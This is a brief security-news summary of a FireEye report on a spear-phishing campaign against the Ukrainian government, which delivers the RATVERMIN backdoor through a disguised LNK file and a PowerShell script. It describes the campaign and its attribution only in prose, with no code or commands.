- The spear phishing campaign drops a powerful backdoor dubbed ‘RATVERMIN’ as part of a second-stage payload delivered with the help of a Powershell script.
- Researchers suspect that the attackers behind the spear phishing campaign might be associated with the Luhansk People's Republic (LPR) group.
What is the issue - Researchers from FireEye uncovered that the Ukranian government and military is being targeted by an on-going spear phishing campaign.
Why it matters - The spear phishing campaign drops a powerful backdoor dubbed ‘RATVERMIN’ as part of a second-stage payload delivered with the help of a Powershell script.
Worth noting - Researchers suspect that the attackers behind the spear phishing campaign might be associated with the Luhansk People's Republic (LPR) group.
The big picture
Researchers noted that the Ukranian government departments have been targeted by the spear phishing campaign since 2014. However, the latest campaign was observed on January 22, 2019.
- The spear phishing emails sent to the Ukranian government departments were purported to come from Armtrac, a UK-based defense manufacturer.
- These emails have subject lines similar to ‘SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD’.
- These emails include a zip file named ‘Armtrac-Commercial.7z’ which contains two MS Word documents and a malicious LNK file with a substituted MS Word icon.
- The malicious LNK file includes a script to execute the PowerShell script.
- The PowerShell script downloads a second-stage payload from a C&C server to drop the ‘RATVERMIN’ backdoor onto the targeted machine.
“This actor has likely been active since at least 2014, and its continuous targeting of the Ukrainian Government suggests a cyber espionage motivation. This is supported by the ties to the so-called LPR's security service,” FireEye researchers said.
The bottom line
“While cyber espionage is regularly leveraged as a tool of state power, this capability is not limited to states. Just as new state actors are consistently drawn to this practice, many substate actors will inevitably develop capabilities as well, especially those with the resources of a state sponsor or nominal control of territory,” John Hultquist, Director of Intelligence Analysis at FireEye told ZDNet.